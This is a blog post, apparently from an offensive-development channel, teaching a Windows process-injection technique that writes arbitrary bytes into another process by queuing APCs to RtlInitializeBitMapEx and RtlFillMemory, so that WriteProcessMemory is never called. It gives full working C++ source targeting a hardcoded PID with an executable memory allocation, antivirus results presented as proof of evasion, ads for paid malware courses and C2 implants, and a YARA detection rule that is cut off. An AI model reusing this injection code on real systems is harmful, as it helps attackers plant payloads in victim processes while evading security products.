May 14, 2026
Remote Process Write Primitive via APC Routines
Welcome to this new Medium post, today we’ll explore a clever process injection primitive that abuses Windows APC (Asynchronous Procedure…
S12 - 0x12Dark Development
11 min read
Welcome to this new Medium post, today we'll explore a clever process injection primitive that abuses Windows APC (Asynchronous Procedure Call) routines to write arbitrary data into a remote process, without ever calling WriteProcessMemory
This technique, originally documented by trickster0, takes advantage of how APC arguments are passed to queued routines. By carefully selecting Windows API functions whose argument layout matches a memory write operation (like RtlFillMemory and RtlInitializeBitMapEx), we can effectively turn the APC mechanism itself into a remote write primitive
Why This Matters
Standard process injection workflows typically rely on WriteProcessMemory to deliver payloads into a target process. This API is heavily monitored by security solutions, it's one of the first hooks any defensive product places, and calls to it from non-system processes are a strong indicator
By replacing WriteProcessMemory with a chain of NtQueueApcThread calls, we achieve the same outcome, arbitrary bytes written to a remote address, while completely skipping the most obvious write API. The data is delivered as function arguments to legitimate ntdll routines, which the kernel happily executes
Courses: Learn how offensive development works on Windows OS from beginner to advanced taking our courses, all explained in C++.
All Courses Learn how real Windows offensive development works
Technique Database: Access 70+ real offensive techniques with weekly updates, complete with code, PoCs, and AV scan results:
Malware Techniques Database Explore an ever-growing collection of techniques
Modules: Dive deep into essential offensive topics with our modular text-training program! Get a new module every 14 days. Start at just $1.99 per module, or unlock lifetime access to all modules for $100.
0x12 Dark Development Learn the best offensive techniques for Windows OS, with content ranging from beginner to advanced levels. All…
The Core Idea
The trick lies in choosing the right victim functions:
RtlFillMemory(Destination, Length, Fill): writes a single byte (Fill) to a destination buffer. By queuing it withLength = 1, we get a 1-byte write primitive where the byte value is whatever we pass as the third argumentRtlInitializeBitMapEx(BitMapHeader, BitMapBuffer, SizeOfBitMap):this one is the real gem. Its internal implementation ends up writing the second and third arguments directly to the structure pointed to by the first argument. That gives us a 16-byte write primitive per APC call, where the two 8-byte halves of our data are simply passed asApcArgument2andApcArgument3
So instead of calling WriteProcessMemory(hProc, dest, buffer, 0x100, NULL), we queue ~16 APC calls (each one writing 16 bytes of our buffer) and let the target thread execute them
Methodology
Before diving into the full source code, let's break down the logic step by step. To achieve a remote memory write without using WriteProcessMemory, we need to follow these logical steps:
- Open the Target Process: First, we need to obtain a handle to the target process with the right permissions. We use the WinAPI
OpenProcessrequestingPROCESS_VM_OPERATION(to allocate memory) andPROCESS_VM_WRITE(required by the kernel even when we never callWriteProcessMemoryourselves). The target process must be accessible at our integrity level - Allocate Remote Memory: Once we have the process handle, we allocate a buffer inside the target's address space using
VirtualAllocEx. This is the destination where our APCs will write the payload byte by byte. The allocation is unavoidable: APCs cannot create memory regions, they can only write into them - Create a Sacrificial Thread: We call
NtCreateThreadExto spawn a new thread in the target process, pointing it toRtlExitUserThreadas its start routine. The thread is created suspended (CREATE_SUSPENDED). This thread exists only to drain our queued APCs and then cleanly terminate itself, it never executes the start routine until all APCs are processed.
4. Queue the APCs (The Write Loop): This is the heart of the technique. We walk through our payload buffer in chunks and queue one APC per chunk:
- 16-byte chunks: queued against
RtlInitializeBitMapEx. The function's argument layout means our two 8-byte payload halves get written into the destination address - 8-byte remainder: also queued against
RtlInitializeBitMapExbut with one argument set toNULL - 1-byte remainder (1–7 bytes): queued against
RtlFillMemory, which writes a single byte per call
Each APC, when executed, performs a tiny memory write without us ever calling a write API directly
5. Resume and Wait: We call ResumeThread on our suspended thread. The thread's APC queue is now drained, each queued routine fires in order, writing its piece of the payload. Oncce all APCs are processed, control returns to RtlExitUserThread and the thread terminates
┌──────────────────┐
│ Local Process │
└────────┬─────────┘
│ 1. OpenProcess(hProc)
│ 2. VirtualAllocEx(remoteHeap)
▼
┌─────────────────────────────────────────┐
│ Remote Target Process │
│ │
│ 3. NtCreateThreadEx (SUSPENDED) │
│ └─> StartRoutine: RtlExitUserThread │
│ │
│ 4. NtQueueApcThread × N │
│ ┌─────────────────────────────────┐ │
│ │ APC 1: RtlInitializeBitMapEx │ │
│ │ → writes 16 bytes @ offset 0 │ │
│ ├─────────────────────────────────┤ │
│ │ APC 2: RtlInitializeBitMapEx │ │
│ │ → writes 16 bytes @ offset 16 │ │
│ ├─────────────────────────────────┤ │
│ │ ... │ │
│ ├─────────────────────────────────┤ │
│ │ APC N: RtlFillMemory │ │
│ │ → writes 1 byte (remainder) │ │
│ └─────────────────────────────────┘ │
│ │
│ 5. ResumeThread │
│ └─> APC queue drains │
│ └─> Thread exits cleanly │
│ │
│ Payload now in remoteHeap │
└─────────────────────────────────────────┘┌──────────────────┐
│ Local Process │
└────────┬─────────┘
│ 1. OpenProcess(hProc)
│ 2. VirtualAllocEx(remoteHeap)
▼
┌─────────────────────────────────────────┐
│ Remote Target Process │
│ │
│ 3. NtCreateThreadEx (SUSPENDED) │
│ └─> StartRoutine: RtlExitUserThread │
│ │
│ 4. NtQueueApcThread × N │
│ ┌─────────────────────────────────┐ │
│ │ APC 1: RtlInitializeBitMapEx │ │
│ │ → writes 16 bytes @ offset 0 │ │
│ ├─────────────────────────────────┤ │
│ │ APC 2: RtlInitializeBitMapEx │ │
│ │ → writes 16 bytes @ offset 16 │ │
│ ├─────────────────────────────────┤ │
│ │ ... │ │
│ ├─────────────────────────────────┤ │
│ │ APC N: RtlFillMemory │ │
│ │ → writes 1 byte (remainder) │ │
│ └─────────────────────────────────┘ │
│ │
│ 5. ResumeThread │
│ └─> APC queue drains │
│ └─> Thread exits cleanly │
│ │
│ Payload now in remoteHeap │
└─────────────────────────────────────────┘Implementation
Now, let's look at how to translate that logic into C++ code. I have broken down the most important parts.
Resolving the ntdll Functions
We need pointers to the undocumented NT functions and the "victim" routines we'll abuse as write primitives. All of them live inside ntdll.dll, which is always loaded in every Windows process, so a single GetModuleHandleA + GetProcAddress is enough
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtdll, "NtQueueApcThread");
LPVOID RtlFillMemory = GetProcAddress(hNtdll, "RtlFillMemory");
LPVOID RtlExitUserThread = GetProcAddress(hNtdll, "RtlExitUserThread");
LPVOID RtlInitializeBitMapEx = GetProcAddress(hNtdll, "RtlInitializeBitMapEx");HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtdll, "NtQueueApcThread");
LPVOID RtlFillMemory = GetProcAddress(hNtdll, "RtlFillMemory");
LPVOID RtlExitUserThread = GetProcAddress(hNtdll, "RtlExitUserThread");
LPVOID RtlInitializeBitMapEx = GetProcAddress(hNtdll, "RtlInitializeBitMapEx");Two things to note here:
RtlExitUserThreadis the start routine for our sacrificial thread, it just terminates the thread cleanly.RtlFillMemoryandRtlInitializeBitMapExare our write primitives in disguise. Their function signatures happen to align perfectly with howNtQueueApcThreadpasses arguments
Creating the Sacrificial Thread
Next, we create the thread that will execute our queued APCs. The key flag is the second-to-last TRUE, which translates to CREATE_SUSPENDED, the thread is paused immediately after creation so we can queue APCs before it runs
HANDLE hThread = NULL;
NtCreateThreadEx(
&hThread,
THREAD_ALL_ACCESS,
NULL,
hProc,
RtlExitUserThread, // Start routine, runs AFTER all APCs are drained
(PVOID)0x00000000, // Argument to start routine (unused)
TRUE, // CreateSuspended
NULL, NULL, NULL, NULL
);HANDLE hThread = NULL;
NtCreateThreadEx(
&hThread,
THREAD_ALL_ACCESS,
NULL,
hProc,
RtlExitUserThread, // Start routine, runs AFTER all APCs are drained
(PVOID)0x00000000, // Argument to start routine (unused)
TRUE, // CreateSuspended
NULL, NULL, NULL, NULL
);At this point we have a suspended thread inside the remote process. Its APC queue is empty, and nothing has executed yet
The Alignment Math
Before we start queuing APCs, we need to know how to split the payload. Our primitives operate at three granularities (16 bytes, 8 bytes, and 1 byte) so we calculate how many of each we need:
int alignmentCheck = sizeofVal % 16; // Bytes that don't fit in a 16 byte chunk
int offsetMax = sizeofVal - alignmentCheck; // Bytes that DO fit in 16 byte chunks
int firCounter = 0, eightCounter = 0, secCounter = 0, mod = 0;int alignmentCheck = sizeofVal % 16; // Bytes that don't fit in a 16 byte chunk
int offsetMax = sizeofVal - alignmentCheck; // Bytes that DO fit in 16 byte chunks
int firCounter = 0, eightCounter = 0, secCounter = 0, mod = 0;For a 44-byte payload, for example, we'd write 32 bytes as two 16 byte chunks, 8 bytes as one 8 byte chunk, and 4 bytes as four 1 byte chunks
The 16 Byte Write Loop
This is the most efficient part, each APC writes 16 bytes at once. The trick is in how NtQueueApcThread passes arguments to RtlInitializeBitMapEx:
if (sizeofVal >= 16) {
for (firCounter = 0; firCounter < offsetMax - 1; firCounter += 16) {
char* heapWriter = (char*)heapAllocation + firCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlInitializeBitMapEx, // ApcRoutine
(PVOID)heapWriter, // Arg1 = destination
(PVOID)*(ULONG_PTR*)((char*)buffer + firCounter + 8),// Arg2 = bytes 8–15
(ULONG) *(ULONG_PTR*)((char*)buffer + firCounter) // Arg3 = bytes 0–7
);
}
}if (sizeofVal >= 16) {
for (firCounter = 0; firCounter < offsetMax - 1; firCounter += 16) {
char* heapWriter = (char*)heapAllocation + firCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlInitializeBitMapEx, // ApcRoutine
(PVOID)heapWriter, // Arg1 = destination
(PVOID)*(ULONG_PTR*)((char*)buffer + firCounter + 8),// Arg2 = bytes 8–15
(ULONG) *(ULONG_PTR*)((char*)buffer + firCounter) // Arg3 = bytes 0–7
);
}
}Here's what's happening: we're not really initializing a bitmap. We're using the fact that RtlInitializeBitMapEx's internal logic writes its 2nd and 3rd arguments to the location pointed to by its 1st argument. By passing 16 bytes of our payload as those two arguments, we get a 16 byte write for free
The 8-Byte and 1-Byte Cleanup Loops
For payloads that don't divide evenly by 16, we mop up the remainder in two phases. First, any 8 byte chunk we can fit:
if (alignmentCheck >= 8) {
for (eightCounter = firCounter; (eightCounter + 8) < (firCounter + alignmentCheck - 1); eightCounter += 8) {
char* heapWriter = (char*)heapAllocation + eightCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlInitializeBitMapEx,
(PVOID)heapWriter,
NULL, // Arg2 unused for 8 byte write
(ULONG)*(ULONG_PTR*)((char*)buffer + eightCounter) // Arg3 = 8 bytes
);
}
alignmentCheck -= 8;
}if (alignmentCheck >= 8) {
for (eightCounter = firCounter; (eightCounter + 8) < (firCounter + alignmentCheck - 1); eightCounter += 8) {
char* heapWriter = (char*)heapAllocation + eightCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlInitializeBitMapEx,
(PVOID)heapWriter,
NULL, // Arg2 unused for 8 byte write
(ULONG)*(ULONG_PTR*)((char*)buffer + eightCounter) // Arg3 = 8 bytes
);
}
alignmentCheck -= 8;
}Then, any remaining 1–7 bytes are written one at a time using RtlFillMemory:
for (; secCounter < (mod + alignmentCheck); secCounter++) {
char* heapWriter = (char*)heapAllocation + secCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlFillMemory,
(PVOID)heapWriter, // Arg1 = destination
(PVOID)1, // Arg2 =length (1 byte)
(ULONG)buffer[secCounter] // Arg3 = byte value
);
}for (; secCounter < (mod + alignmentCheck); secCounter++) {
char* heapWriter = (char*)heapAllocation + secCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlFillMemory,
(PVOID)heapWriter, // Arg1 = destination
(PVOID)1, // Arg2 =length (1 byte)
(ULONG)buffer[secCounter] // Arg3 = byte value
);
}RtlFillMemory(dest, length, value) is essentially memset, by passing length = 1, it writes exactly one byte. We sacrifice efficiency for the last few bytes, but it's only ever 1–7 calls at most
Triggering Execution
With all APCs queued, the suspended thread holds them in its kernel-side APC queue. A single call to ResumeThread makes the kernel drain that queue in FIFO order, each APC fires, performs its tiny write, and returns. Once the queue is empty, the thread proceeds to its actual start routine (RtlExitUserThread) and terminates
ResumeThread(hThread);
WaitForSingleObject(hThread, FALSE);ResumeThread(hThread);
WaitForSingleObject(hThread, FALSE);And that's all, now let's see the whole code.
Code
main.cpp
#include <iostream>
#include <Windows.h>
#include <ntstatus.h>
#include <TlHelp32.h>
//#include <ntdef.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef NTSTATUS(NTAPI* pNtCreateThreadEx)(
PHANDLE hThread,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
HANDLE ProcessHandle,
PVOID StartRoutine,
PVOID Argument,
ULONG CreateFlags,
ULONG_PTR ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
PVOID AttributeList
);
typedef NTSTATUS(NTAPI* pNtQueueApcThread)(
HANDLE ThreadHandle,
PVOID ApcRoutine,
PVOID ApcRoutineContext,
PVOID ApcStatusBlock,
ULONG ApcReserved
);
// https://trickster0.github.io/posts/Primitive-Injection/
void WriteRemoteMemory(HANDLE hProc, LPVOID heapAllocation, int sizeofVal, unsigned char* buffer){
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtdll, "NtQueueApcThread");
LPVOID RtlFillMemory = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlFillMemory");
LPVOID RtlExitUserThread = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlExitUserThread");
LPVOID RtlInitializeBitMapEx = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitializeBitMapEx");
HANDLE hThread2 = NULL;
NtCreateThreadEx(&hThread2, THREAD_ALL_ACCESS, NULL, hProc, RtlExitUserThread, (PVOID)0x00000000, TRUE, NULL, NULL, NULL, NULL);
int alignmentCheck = sizeofVal % 16;
int offsetMax = sizeofVal - alignmentCheck;
int firCounter = 0; int eightCounter = 0; int secCounter = 0; int mod = 0;
if (sizeofVal >= 16) {
for (firCounter = 0; firCounter < offsetMax - 1; firCounter = firCounter + 16) {
char* heapWriter = (char*)heapAllocation + firCounter;
NtQueueApcThread(hThread2, (PVOID)RtlInitializeBitMapEx, (PVOID)heapWriter, (PVOID) * (ULONG_PTR*)((char*)buffer + firCounter + 8), (ULONG) * (ULONG_PTR*)((char*)buffer + firCounter));
}
}
if (alignmentCheck >= 8) {
for (eightCounter = firCounter; (eightCounter + 8) < (firCounter + alignmentCheck - 1); eightCounter = eightCounter + 8) {
char* heapWriter = (char*)heapAllocation + eightCounter;
NtQueueApcThread(hThread2, (PVOID)RtlInitializeBitMapEx, (PVOID)heapWriter, NULL, (ULONG) * (ULONG_PTR*)((char*)buffer + eightCounter));
}
alignmentCheck -= 8;
}
if (alignmentCheck != 0 && alignmentCheck < 8) {
if ((firCounter != 0 && eightCounter != 0) || (firCounter != 0 && eightCounter != 0)) {
secCounter = eightCounter;
mod = eightCounter;
}
else if (firCounter != 0 && eightCounter == 0) {
secCounter = firCounter;
mod = firCounter;
}
for (; secCounter < (mod + alignmentCheck); secCounter++) {
char* heapWriter = (char*)heapAllocation + secCounter;
NtQueueApcThread(hThread2, (PVOID)RtlFillMemory, (PVOID)heapWriter, (PVOID)1, (ULONG)buffer[secCounter]);
}
}
ResumeThread(hThread2);
WaitForSingleObject(hThread2, FALSE);
}
int main()
{
std::cout << "Writting Remote Process Memory!\n";
unsigned char myData[] = "This memory was written using APC routines!";
int dataSize = sizeof(myData);
int pid = 10948;
HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION, FALSE, pid);
// 3. Allocate memory in the target process (where the APCs will write to)
LPVOID remoteHeap = VirtualAllocEx(
hProc,
NULL,
dataSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (remoteHeap == NULL) {
std::cerr << "Failed to allocate remote memory. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Target Memory Address: " << remoteHeap << std::endl;
WriteRemoteMemory(hProc, remoteHeap, dataSize, myData);
std::cout << "Time of verification.. " << std::endl;
getchar();
return 0;
}#include <iostream>
#include <Windows.h>
#include <ntstatus.h>
#include <TlHelp32.h>
//#include <ntdef.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef NTSTATUS(NTAPI* pNtCreateThreadEx)(
PHANDLE hThread,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
HANDLE ProcessHandle,
PVOID StartRoutine,
PVOID Argument,
ULONG CreateFlags,
ULONG_PTR ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
PVOID AttributeList
);
typedef NTSTATUS(NTAPI* pNtQueueApcThread)(
HANDLE ThreadHandle,
PVOID ApcRoutine,
PVOID ApcRoutineContext,
PVOID ApcStatusBlock,
ULONG ApcReserved
);
// https://trickster0.github.io/posts/Primitive-Injection/
void WriteRemoteMemory(HANDLE hProc, LPVOID heapAllocation, int sizeofVal, unsigned char* buffer){
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtdll, "NtQueueApcThread");
LPVOID RtlFillMemory = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlFillMemory");
LPVOID RtlExitUserThread = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlExitUserThread");
LPVOID RtlInitializeBitMapEx = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitializeBitMapEx");
HANDLE hThread2 = NULL;
NtCreateThreadEx(&hThread2, THREAD_ALL_ACCESS, NULL, hProc, RtlExitUserThread, (PVOID)0x00000000, TRUE, NULL, NULL, NULL, NULL);
int alignmentCheck = sizeofVal % 16;
int offsetMax = sizeofVal - alignmentCheck;
int firCounter = 0; int eightCounter = 0; int secCounter = 0; int mod = 0;
if (sizeofVal >= 16) {
for (firCounter = 0; firCounter < offsetMax - 1; firCounter = firCounter + 16) {
char* heapWriter = (char*)heapAllocation + firCounter;
NtQueueApcThread(hThread2, (PVOID)RtlInitializeBitMapEx, (PVOID)heapWriter, (PVOID) * (ULONG_PTR*)((char*)buffer + firCounter + 8), (ULONG) * (ULONG_PTR*)((char*)buffer + firCounter));
}
}
if (alignmentCheck >= 8) {
for (eightCounter = firCounter; (eightCounter + 8) < (firCounter + alignmentCheck - 1); eightCounter = eightCounter + 8) {
char* heapWriter = (char*)heapAllocation + eightCounter;
NtQueueApcThread(hThread2, (PVOID)RtlInitializeBitMapEx, (PVOID)heapWriter, NULL, (ULONG) * (ULONG_PTR*)((char*)buffer + eightCounter));
}
alignmentCheck -= 8;
}
if (alignmentCheck != 0 && alignmentCheck < 8) {
if ((firCounter != 0 && eightCounter != 0) || (firCounter != 0 && eightCounter != 0)) {
secCounter = eightCounter;
mod = eightCounter;
}
else if (firCounter != 0 && eightCounter == 0) {
secCounter = firCounter;
mod = firCounter;
}
for (; secCounter < (mod + alignmentCheck); secCounter++) {
char* heapWriter = (char*)heapAllocation + secCounter;
NtQueueApcThread(hThread2, (PVOID)RtlFillMemory, (PVOID)heapWriter, (PVOID)1, (ULONG)buffer[secCounter]);
}
}
ResumeThread(hThread2);
WaitForSingleObject(hThread2, FALSE);
}
int main()
{
std::cout << "Writting Remote Process Memory!\n";
unsigned char myData[] = "This memory was written using APC routines!";
int dataSize = sizeof(myData);
int pid = 10948;
HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION, FALSE, pid);
// 3. Allocate memory in the target process (where the APCs will write to)
LPVOID remoteHeap = VirtualAllocEx(
hProc,
NULL,
dataSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (remoteHeap == NULL) {
std::cerr << "Failed to allocate remote memory. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Target Memory Address: " << remoteHeap << std::endl;
WriteRemoteMemory(hProc, remoteHeap, dataSize, myData);
std::cout << "Time of verification.. " << std::endl;
getchar();
return 0;
}Proof of Concept
Writting Remote Process Memory!
Target Memory Address: 00000230621E0000Writting Remote Process Memory!
Target Memory Address: 00000230621E0000
We build custom C2 agents and implants for red teams, giving full control and stealthy operation in real-world tests.
Custom Agents — 0x12 Dark Development Custom C2 Agents Built for the Real World. Command & Control agents compatible with Mythic, Havoc and leading…
Detection
Now it's time to see if the defenses are detecting this as a malicious threat
Kleenscan API
[*] Antivirus Scan Results:
- alyac | Status: ok | Flag: Undetected | Updated: 2026-05-13
- amiti | Status: ok | Flag: Undetected | Updated: 2026-05-13
- arcabit | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avast | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avg | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avira | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-05-13
- bullguard | Status: ok | Flag: Undetected | Updated: 2026-05-13
- clamav | Status: ok | Flag: Undetected | Updated: 2026-05-13
- comodolinux | Status: ok | Flag: Undetected | Updated: 2026-05-13
- crowdstrike | Status: ok | Flag: Undetected | Updated: 2026-05-13
- drweb | Status: ok | Flag: Undetected | Updated: 2026-05-13
- emsisoft | Status: ok | Flag: Undetected | Updated: 2026-05-13
- escan | Status: ok | Flag: Undetected | Updated: 2026-05-13
- fprot | Status: ok | Flag: Undetected | Updated: 2026-05-13
- fsecure | Status: ok | Flag: Undetected | Updated: 2026-05-13
- gdata | Status: ok | Flag: Undetected | Updated: 2026-05-13
- ikarus | Status: ok | Flag: Trojan.Win64.Krypt | Updated: 2026-05-13
- immunet | Status: ok | Flag: Undetected | Updated: 2026-05-13
- kaspersky | Status: failed | Flag: Scanning results incomplete | Updated: 2026-05-13
- maxsecure | Status: ok | Flag: Undetected | Updated: 2026-05-13
- mcafee | Status: ok | Flag: Undetected | Updated: 2026-05-13
- microsoftdefender | Status: ok | Flag: Undetected | Updated: 2026-05-13
- nano | Status: ok | Flag: Undetected | Updated: 2026-05-13
- nod32 | Status: ok | Flag: Undetected | Updated: 2026-05-13
- norman | Status: ok | Flag: Undetected | Updated: 2026-05-13
- secureageapex | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-05-13
- seqrite | Status: ok | Flag: Undetected | Updated: 2026-05-13
- sophos | Status: ok | Flag: Undetected | Updated: 2026-05-13
- threatdown | Status: ok | Flag: Undetected | Updated: 2026-05-13
- trendmicro | Status: ok | Flag: Undetected | Updated: 2026-05-13
- vba32 | Status: ok | Flag: Undetected | Updated: 2026-05-13
- virusfighter | Status: ok | Flag: Undetected | Updated: 2026-05-13
- xvirus | Status: ok | Flag: Undetected | Updated: 2026-05-13
- zillya | Status: ok | Flag: Undetected | Updated: 2026-05-13
- zonealarm | Status: pending | Flag: N/A | Updated: 2026-05-13
- zoner | Status: ok | Flag: Undetected | Updated: 2026-05-13[*] Antivirus Scan Results:
- alyac | Status: ok | Flag: Undetected | Updated: 2026-05-13
- amiti | Status: ok | Flag: Undetected | Updated: 2026-05-13
- arcabit | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avast | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avg | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avira | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-05-13
- bullguard | Status: ok | Flag: Undetected | Updated: 2026-05-13
- clamav | Status: ok | Flag: Undetected | Updated: 2026-05-13
- comodolinux | Status: ok | Flag: Undetected | Updated: 2026-05-13
- crowdstrike | Status: ok | Flag: Undetected | Updated: 2026-05-13
- drweb | Status: ok | Flag: Undetected | Updated: 2026-05-13
- emsisoft | Status: ok | Flag: Undetected | Updated: 2026-05-13
- escan | Status: ok | Flag: Undetected | Updated: 2026-05-13
- fprot | Status: ok | Flag: Undetected | Updated: 2026-05-13
- fsecure | Status: ok | Flag: Undetected | Updated: 2026-05-13
- gdata | Status: ok | Flag: Undetected | Updated: 2026-05-13
- ikarus | Status: ok | Flag: Trojan.Win64.Krypt | Updated: 2026-05-13
- immunet | Status: ok | Flag: Undetected | Updated: 2026-05-13
- kaspersky | Status: failed | Flag: Scanning results incomplete | Updated: 2026-05-13
- maxsecure | Status: ok | Flag: Undetected | Updated: 2026-05-13
- mcafee | Status: ok | Flag: Undetected | Updated: 2026-05-13
- microsoftdefender | Status: ok | Flag: Undetected | Updated: 2026-05-13
- nano | Status: ok | Flag: Undetected | Updated: 2026-05-13
- nod32 | Status: ok | Flag: Undetected | Updated: 2026-05-13
- norman | Status: ok | Flag: Undetected | Updated: 2026-05-13
- secureageapex | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-05-13
- seqrite | Status: ok | Flag: Undetected | Updated: 2026-05-13
- sophos | Status: ok | Flag: Undetected | Updated: 2026-05-13
- threatdown | Status: ok | Flag: Undetected | Updated: 2026-05-13
- trendmicro | Status: ok | Flag: Undetected | Updated: 2026-05-13
- vba32 | Status: ok | Flag: Undetected | Updated: 2026-05-13
- virusfighter | Status: ok | Flag: Undetected | Updated: 2026-05-13
- xvirus | Status: ok | Flag: Undetected | Updated: 2026-05-13
- zillya | Status: ok | Flag: Undetected | Updated: 2026-05-13
- zonealarm | Status: pending | Flag: N/A | Updated: 2026-05-13
- zoner | Status: ok | Flag: Undetected | Updated: 2026-05-13YARA
Here a YARA rule to detect this technique:
rule APC_Argument_Abuse_Write_Primitive
{
meta:
description = "Detects APC-based remote memory write primitive abusing ntdll routines (RtlFillMemory, RtlInitializeBitMapEx) as write gadgets via NtQueueApcThread/NtQueueApcThreadEx2"
author = "0x12 Dark Development"
date = "2026-05-14"
reference = "https://trickster0.github.io/posts/Primitive-Injection/"
severity = "high"
category = "process_injection"
technique = "T1055"
strings:
// Core NT APIs commonly imported by name or resolved dynamically
$api_ntcreatethreadex = "NtCreateThreadEx" ascii wide nocase
$api_ntqueueapc = "NtQueueApcThread" ascii wide nocase
$api_ntqueueapcex = "NtQueueApcThreadEx" ascii wide nocase
$api_ntqueueapcex2 = "NtQueueApcThreadEx2" ascii wide nocase
// Memory operation primitives used as write gadgets
$gadget_fillmemory = "RtlFillMemory" ascii wide
$gadget_bitmap = "RtlInitializeBitMapEx" ascii wide
$gadget_exitthread = "RtlExitUserThread" ascii wide
$gadget_copymemory = "RtlCopyMemory" ascii wide
$gadget_zeromemory = "RtlZeroMemory" ascii wide
$gadget_movememory = "RtlMoveMemory" ascii wide
// Companion APIs typically chained with this primitive
$api_virtualallocex = "VirtualAllocEx" ascii wide
$api_openprocess = "OpenProcess" ascii wide
$api_openthread = "OpenThread" ascii wide
$api_resumethread = "ResumeThread" ascii wide
$api_createsnapshot = "CreateToolhelp32Snapshot" ascii wide
// Special User APC flag value (NtQueueApcThreadEx2 variant)
// QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC = 0x2 — flag pushed as immediate
$special_apc_flag_1 = { B? 02 00 00 00 } // mov reg, 2
$special_apc_flag_2 = { 6A 02 } // push 2
$alertable_apc_flag = { B? 01 00 00 00 } // mov reg, 1 (alertable)
// String literal commonly seen in PoCs/tooling adapted from this primitive
$str_pid_hardcode = /pid\s*=\s*\d{2,6}/ ascii nocase
$str_apc_marker = "APC routines" ascii wide nocase
$str_remote_write = "WriteRemoteMemory" ascii wide
condition:
uint16(0) == 0x5A4D and // PE header (MZ)
filesize < 5MB and
// Must reference at least one APC queueing API
(
any of ($api_ntqueueapc*, $api_ntqueueapcex2)
)
and
// Must reference at least one ntdll routine used as write gadget
(
2 of ($gadget_fillmemory, $gadget_bitmap, $gadget_exitthread,
$gadget_copymemory, $gadget_zeromemory, $gadget_movememory)
)
and
// Must combine with remote process operation APIs
(
$api_virtualallocex and
($api_openprocess or $api_openthread)
)
and
// Either: classic variant (thread creation + resume)
// Or: Ex2 variant (Special User APC flag present)
(
($api_ntcreatethreadex and $api_resumethread) or
($api_ntqueueapcex2 and any of ($special_apc_flag_1, $special_apc_flag_2)) or
any of ($str_remote_write, $str_apc_marker)
)
}rule APC_Argument_Abuse_Write_Primitive
{
meta:
description = "Detects APC-based remote memory write primitive abusing ntdll routines (RtlFillMemory, RtlInitializeBitMapEx) as write gadgets via NtQueueApcThread/NtQueueApcThreadEx2"
author = "0x12 Dark Development"
date = "2026-05-14"
reference = "https://trickster0.github.io/posts/Primitive-Injection/"
severity = "high"
category = "process_injection"
technique = "T1055"
strings:
// Core NT APIs commonly imported by name or resolved dynamically
$api_ntcreatethreadex = "NtCreateThreadEx" ascii wide nocase
$api_ntqueueapc = "NtQueueApcThread" ascii wide nocase
$api_ntqueueapcex = "NtQueueApcThreadEx" ascii wide nocase
$api_ntqueueapcex2 = "NtQueueApcThreadEx2" ascii wide nocase
